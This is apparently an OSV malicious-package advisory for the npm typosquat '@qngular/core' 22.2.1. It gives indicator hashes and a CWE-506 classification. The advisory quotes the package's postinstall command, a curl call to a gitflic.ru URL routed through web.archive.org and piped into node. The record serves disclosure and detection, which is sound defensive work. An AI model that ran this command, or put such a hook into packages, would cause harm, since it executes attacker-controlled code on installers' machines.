{"id":"MAL-2026-17544","summary":"Malicious code in @qngular/core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e83437986b94381cddff72267bc53907d980e1b14dbfef9123aa47f5ed664664)\nPackage `@qngular/core` is a one-character typosquat of `@angular/core` and copies the real package's description, author, and repository metadata. The `postinstall` lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque, non-publisher-controlled JavaScript payload from a third-party host (gitflic.ru via a web.archive.org proxy) and piping it unverified into `node`. This executes attacker-controlled code on the installer's machine during `npm install`.\n","modified":"2026-10-05T04:15:04.304449961Z","published":"2026-10-05T03:31:47Z","database_specific":{"malicious-packages-origins":[{"sha256":"e83437986b94381cddff72267bc53907d980e1b14dbfef9123aa47f5ed664664","source":"amazon-inspector","versions":["22.2.1"],"id":"IN-MAL-2026-020990","import_time":"2026-10-05T03:57:37.087853647Z","modified_time":"2026-10-05T03:31:47Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@qngular/core/v/22.2.1"}],"affected":[{"package":{"name":"@qngular/core","ecosystem":"npm","purl":"pkg:npm/%40qngular/core"},"versions":["22.2.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"filename":"core-22.2.1.tgz","hashes":{"sha1":"d32c937f06febe82f6cd4531056a432ebab066bc","sha512_sri":"sha512-/gg2P1MKGE1wSAQsqaH7rA8I7Ge36Iv/zCwTdXXGJirjsPNADoVNyxEN5OrVeHKHr2woGAI7q1H649svtEABLw=="}}],"evidence_files":[{"sha256":"b9f05dbb17263ec1a6e847fef8a82f81d3db47d975a16708953450cb1afa1d03","tlsh":"54513724e4f48d6323df6294dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a","path":"package.json"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@qngular/core/MAL-2026-17544.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}